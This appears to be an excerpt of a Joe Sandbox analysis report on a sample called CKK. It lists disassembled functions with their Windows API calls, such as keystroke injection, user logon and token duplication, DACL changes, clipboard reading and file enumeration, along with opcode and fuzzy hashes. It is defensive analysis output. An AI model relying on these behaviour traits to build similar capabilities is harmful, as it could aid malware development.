                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CreateErrorFileLast
                                          • String ID:
                                          • API String ID: 1214770103-0
                                          • Opcode ID: 12cfbd7a26738fe7c24c369cb30541b4ef969fe22b7cd28f86d47a823e678170
                                          • Instruction ID: 037eefcc04f46808a53d6b6d85f650250e569a248e71e7b848ea22c7c6924798
                                          • Opcode Fuzzy Hash: 12cfbd7a26738fe7c24c369cb30541b4ef969fe22b7cd28f86d47a823e678170
                                          • Instruction Fuzzy Hash: A981A2306087019FC714EF28D491BAAB7E1BF89314F04652DF8867B6A2DB34ED45CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E5FC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                          • Instruction ID: 1a69f5474b9311fa1dfb022f896807ca2d983b47b207ec7c9e667caa8b861604
                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                          • Instruction Fuzzy Hash: 85310274A001099BC718CF59D480A69FBB2FF49306B64AAB5E809EF656D731EDC5CBC0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00112300 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Sleep.KERNELBASE(000001F4), ref: 00112311
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447471100.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_110000_CKK.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                          • Instruction ID: e2df254de8c2fb3be45f9621f48da09837082d860dac535b2d744f78e974596e
                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                          • Instruction Fuzzy Hash: B4E0BF7494010D9FDB00EFB4D5496AE7BB4EF04301F100561FD0192280D73099608A62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 00ED9576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E59BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E59BB2
                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00ED961A
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00ED965B
                                          • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00ED969F
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00ED96C9
                                          • SendMessageW.USER32 ref: 00ED96F2
                                          • GetKeyState.USER32(00000011), ref: 00ED978B
                                          • GetKeyState.USER32(00000009), ref: 00ED9798
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00ED97AE
                                          • GetKeyState.USER32(00000010), ref: 00ED97B8
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00ED97E9
                                          • SendMessageW.USER32 ref: 00ED9810
                                          • SendMessageW.USER32(?,00001030,?,00ED7E95), ref: 00ED9918
                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00ED992E
                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00ED9941
                                          • SetCapture.USER32(?), ref: 00ED994A
                                          • ClientToScreen.USER32(?,?), ref: 00ED99AF
                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00ED99BC
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00ED99D6
                                          • ReleaseCapture.USER32 ref: 00ED99E1
                                          • GetCursorPos.USER32(?), ref: 00ED9A19
                                          • ScreenToClient.USER32(?,?), ref: 00ED9A26
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00ED9A80
                                          • SendMessageW.USER32 ref: 00ED9AAE
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00ED9AEB
                                          • SendMessageW.USER32 ref: 00ED9B1A
                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00ED9B3B
                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00ED9B4A
                                          • GetCursorPos.USER32(?), ref: 00ED9B68
                                          • ScreenToClient.USER32(?,?), ref: 00ED9B75
                                          • GetParent.USER32(?), ref: 00ED9B93
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00ED9BFA
                                          • SendMessageW.USER32 ref: 00ED9C2B
                                          • ClientToScreen.USER32(?,?), ref: 00ED9C84
                                          • TrackPopupMenuEx.USER32 ref: 00ED9CB4
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00ED9CDE
                                          • SendMessageW.USER32 ref: 00ED9D01
                                          • ClientToScreen.USER32(?,?), ref: 00ED9D4E
                                          • TrackPopupMenuEx.USER32 ref: 00ED9D82
                                            • Part of subcall function 00E59944: GetWindowLongW.USER32(?,000000EB), ref: 00E59952
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00ED9E05
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                          • String ID: @GUI_DRAGID$F
                                          • API String ID: 3429851547-4164748364
                                          • Opcode ID: 207390fbc2afa9d37b4d86a273268d274532e745d3c894ec26b229bd99d8083e
                                          • Instruction ID: 83f987b614e6fe54f260cbb7dc2243208a20a142dd237f77decb72b277ddbf0a
                                          • Opcode Fuzzy Hash: 207390fbc2afa9d37b4d86a273268d274532e745d3c894ec26b229bd99d8083e
                                          • Instruction Fuzzy Hash: 0A42BE30204201AFDB24CF24DC44AAABBE5FF48754F14561EF6A9A73E2D731E856DB42
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED4873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00ED48F3
                                          • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00ED4908
                                          • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00ED4927
                                          • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00ED494B
                                          • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00ED495C
                                          • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00ED497B
                                          • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00ED49AE
                                          • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00ED49D4
                                          • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00ED4A0F
                                          • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00ED4A56
                                          • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00ED4A7E
                                          • IsMenu.USER32(?), ref: 00ED4A97
                                          • GetMenuItemInfoW.USER32 ref: 00ED4AF2
                                          • GetMenuItemInfoW.USER32 ref: 00ED4B20
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00ED4B94
                                          • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00ED4BE3
                                          • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00ED4C82
                                          • wsprintfW.USER32 ref: 00ED4CAE
                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00ED4CC9
                                          • GetWindowTextW.USER32 ref: 00ED4CF1
                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00ED4D13
                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00ED4D33
                                          • GetWindowTextW.USER32 ref: 00ED4D5A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                          • String ID: %d/%02d/%02d
                                          • API String ID: 4054740463-328681919
                                          • Opcode ID: 3b25804efb54e6d3eaaec4c1197624506e067722043e7a6ea46d5104f9273e39
                                          • Instruction ID: af28778781d3a616326c1c04e9c506d6ba6460255e01d6a67b849e187d9d32d6
                                          • Opcode Fuzzy Hash: 3b25804efb54e6d3eaaec4c1197624506e067722043e7a6ea46d5104f9273e39
                                          • Instruction Fuzzy Hash: 331210B1600205AFEB248F25DC49FAE7BF8EF55714F10612AF915FA2E0DB749A42CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E5F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetForegroundWindow.USER32 ref: 00E5F998
                                          • FindWindowW.USER32 ref: 00E9F474
                                          • IsIconic.USER32(00000000), ref: 00E9F47D
                                          • ShowWindow.USER32(00000000,00000009), ref: 00E9F48A
                                          • SetForegroundWindow.USER32(00000000), ref: 00E9F494
                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E9F4AA
                                          • GetCurrentThreadId.KERNEL32 ref: 00E9F4B1
                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E9F4BD
                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E9F4CE
                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E9F4D6
                                          • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00E9F4DE
                                          • SetForegroundWindow.USER32(00000000), ref: 00E9F4E1
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E9F4F6
                                          • keybd_event.USER32 ref: 00E9F501
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E9F50B
                                          • keybd_event.USER32 ref: 00E9F510
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E9F519
                                          • keybd_event.USER32 ref: 00E9F51E
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E9F528
                                          • keybd_event.USER32 ref: 00E9F52D
                                          • SetForegroundWindow.USER32(00000000), ref: 00E9F530
                                          • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00E9F557
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 4125248594-2988720461
                                          • Opcode ID: 0a2872db900ce5d1f47576c6baab7ec1de3f53db25a3d59b38b6fcf1a03f6bf9
                                          • Instruction ID: 8803d0eaa2751f640cfc20a4312532d0f4300deff49733441a20a74cb8e1cef3
                                          • Opcode Fuzzy Hash: 0a2872db900ce5d1f47576c6baab7ec1de3f53db25a3d59b38b6fcf1a03f6bf9
                                          • Instruction Fuzzy Hash: 17315271A412197EEF206BB66C49FBF7F6CEB44B50F210066F601F61D1C6B09D00EA61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA1201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EA16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EA170D
                                            • Part of subcall function 00EA16C3: AdjustTokenPrivileges.ADVAPI32 ref: 00EA173A
                                            • Part of subcall function 00EA16C3: GetLastError.KERNEL32 ref: 00EA174A
                                          • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00EA1286
                                          • DuplicateTokenEx.ADVAPI32 ref: 00EA12A8
                                          • CloseHandle.KERNEL32(?), ref: 00EA12B9
                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00EA12D1
                                          • GetProcessWindowStation.USER32 ref: 00EA12EA
                                          • SetProcessWindowStation.USER32 ref: 00EA12F4
                                          • OpenDesktopW.USER32 ref: 00EA1310
                                            • Part of subcall function 00EA10BF: AdjustTokenPrivileges.ADVAPI32 ref: 00EA10D4
                                            • Part of subcall function 00EA10BF: CloseHandle.KERNEL32(?), ref: 00EA10E9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                          • String ID: $default$winsta0
                                          • API String ID: 22674027-1027155976
                                          • Opcode ID: d00d6f27f26a8c9b23e12ad573b01f74817b3aded94a0c088af92b7e3aa2f394
                                          • Instruction ID: 1ffcd77d93266806ec079102a4c1175759c1d8184a5dba7ae7ec07df65e83dc8
                                          • Opcode Fuzzy Hash: d00d6f27f26a8c9b23e12ad573b01f74817b3aded94a0c088af92b7e3aa2f394
                                          • Instruction Fuzzy Hash: 72819E71900209AFDF119FA9DC49FEE7BB9EF0D744F1451AAF920BA1A0C774A944CB21
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA0B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EA10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EA1114
                                            • Part of subcall function 00EA10F9: GetLastError.KERNEL32 ref: 00EA1120
                                            • Part of subcall function 00EA10F9: GetProcessHeap.KERNEL32 ref: 00EA112F
                                            • Part of subcall function 00EA10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00EA0B9B,?,?,?), ref: 00EA1136
                                            • Part of subcall function 00EA10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EA114D
                                          • GetSecurityDescriptorDacl.ADVAPI32 ref: 00EA0BCC
                                          • GetAclInformation.ADVAPI32 ref: 00EA0C00
                                          • GetLengthSid.ADVAPI32(?), ref: 00EA0C17
                                          • GetAce.ADVAPI32 ref: 00EA0C51
                                          • AddAce.ADVAPI32 ref: 00EA0C6D
                                          • GetLengthSid.ADVAPI32(?), ref: 00EA0C84
                                          • GetProcessHeap.KERNEL32 ref: 00EA0C8C
                                          • HeapAlloc.KERNEL32(00000000), ref: 00EA0C93
                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EA0CB4
                                          • CopySid.ADVAPI32 ref: 00EA0CBB
                                          • AddAce.ADVAPI32 ref: 00EA0CEA
                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EA0D0C
                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EA0D1E
                                          • GetProcessHeap.KERNEL32 ref: 00EA0D45
                                          • HeapFree.KERNEL32(00000000), ref: 00EA0D4C
                                          • GetProcessHeap.KERNEL32 ref: 00EA0D55
                                          • HeapFree.KERNEL32(00000000), ref: 00EA0D5C
                                          • GetProcessHeap.KERNEL32 ref: 00EA0D65
                                          • HeapFree.KERNEL32(00000000), ref: 00EA0D6C
                                          • GetProcessHeap.KERNEL32 ref: 00EA0D78
                                          • HeapFree.KERNEL32(00000000), ref: 00EA0D7F
                                            • Part of subcall function 00EA1193: GetProcessHeap.KERNEL32 ref: 00EA11A1
                                            • Part of subcall function 00EA1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00EA0BB1,?), ref: 00EA11A8
                                            • Part of subcall function 00EA1193: InitializeSecurityDescriptor.ADVAPI32 ref: 00EA11B7
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                          • String ID:
                                          • API String ID: 4175595110-0
                                          • Opcode ID: c98619d79d091faf9cbd5fdfdc4bb88a39fed2139c1c67d2345f19e7bdbf72ed
                                          • Instruction ID: 25e20835a46eee071662b84aedb00990ef1781747f0852107cf4265c5fec66fa
                                          • Opcode Fuzzy Hash: c98619d79d091faf9cbd5fdfdc4bb88a39fed2139c1c67d2345f19e7bdbf72ed
                                          • Instruction Fuzzy Hash: 22719C7290121AAFDF10DFA5EC44BAEBBB8FF09354F144115E914BB190D771A909CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EBEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenClipboard.USER32(00EDCC08), ref: 00EBEB29
                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 00EBEB37
                                          • GetClipboardData.USER32 ref: 00EBEB43
                                          • CloseClipboard.USER32 ref: 00EBEB4F
                                          • GlobalLock.KERNEL32 ref: 00EBEB87
                                          • CloseClipboard.USER32 ref: 00EBEB91
                                          • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00EBEBBC
                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 00EBEBC9
                                          • GetClipboardData.USER32 ref: 00EBEBD1
                                          • GlobalLock.KERNEL32 ref: 00EBEBE2
                                          • GlobalUnlock.KERNEL32(00000000,?), ref: 00EBEC22
                                          • IsClipboardFormatAvailable.USER32(0000000F), ref: 00EBEC38
                                          • GetClipboardData.USER32 ref: 00EBEC44
                                          • GlobalLock.KERNEL32 ref: 00EBEC55
                                          • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00EBEC77
                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00EBEC94
                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00EBECD2
                                          • GlobalUnlock.KERNEL32(00000000,?,?), ref: 00EBECF3
                                          • CountClipboardFormats.USER32 ref: 00EBED14
                                          • CloseClipboard.USER32 ref: 00EBED59
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                          • String ID:
                                          • API String ID: 420908878-0
                                          • Opcode ID: 0c43b91d3ca4a845b6720699581d11eeb391d04392496613a8ef1d79bb202de7
                                          • Instruction ID: 930d26ced6e287c3c7b785a65c0e80cb59d0be1a2a3ce3195e79de56f8d9d516
                                          • Opcode Fuzzy Hash: 0c43b91d3ca4a845b6720699581d11eeb391d04392496613a8ef1d79bb202de7
                                          • Instruction Fuzzy Hash: D461A0352042029FD310EF25E885FABB7E8EF84758F14651AF456B72A2CB71DD09CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00EB69BE
                                          • FindClose.KERNEL32(00000000), ref: 00EB6A12
                                          • FileTimeToLocalFileTime.KERNEL32 ref: 00EB6A4E
                                          • FileTimeToLocalFileTime.KERNEL32 ref: 00EB6A75
                                            • Part of subcall function 00E49CB3: _wcslen.LIBCMT ref: 00E49CBD
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EB6AB2
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EB6ADF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                          • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                          • API String ID: 3830820486-3289030164
                                          • Opcode ID: cb82f0b20df9ab2a6d69cac5f7e861d4ab3a9a3de641bb088c79f84dff4de4b6
                                          • Instruction ID: 7207e7a5f80b42f7a5d6624915460cff32c8031bddc64e36fb570d1e61b40e8b
                                          • Opcode Fuzzy Hash: cb82f0b20df9ab2a6d69cac5f7e861d4ab3a9a3de641bb088c79f84dff4de4b6
                                          • Instruction Fuzzy Hash: 77D14271508300AFC714EBA4D891EAFB7ECAF88704F44591DF585E7192EB78DA48CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00EB9663
                                          • GetFileAttributesW.KERNEL32 ref: 00EB96A1
                                          • SetFileAttributesW.KERNEL32 ref: 00EB96BB
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00EB96D3
                                          • FindClose.KERNEL32(00000000), ref: 00EB96DE
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00EB96FA
                                          • SetCurrentDirectoryW.KERNEL32 ref: 00EB974A
                                          • SetCurrentDirectoryW.KERNEL32 ref: 00EB9768
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EB9772
                                          • FindClose.KERNEL32(00000000), ref: 00EB977F
                                          • FindClose.KERNEL32(00000000), ref: 00EB978F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                          • String ID: *.*
                                          • API String ID: 1409584000-438819550
                                          • Opcode ID: c5368aac009b2882671d91a76362d834c48f6f1c1e0d66220677198b6e9d288d
                                          • Instruction ID: 477f0aeabb417e520eca6b65039dc6e0fe1a440efb38c0746422e3dfc3f58c3c
                                          • Opcode Fuzzy Hash: c5368aac009b2882671d91a76362d834c48f6f1c1e0d66220677198b6e9d288d
                                          • Instruction Fuzzy Hash: 3F31D07264161A6ECB20AFB5EC48ADF77ECDF49364F205157FA04F21A1EB34D944CA50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00EB97BE
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00EB9819
                                          • FindClose.KERNEL32(00000000), ref: 00EB9824
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00EB9840
                                          • SetCurrentDirectoryW.KERNEL32 ref: 00EB9890
                                          • SetCurrentDirectoryW.KERNEL32 ref: 00EB98AE
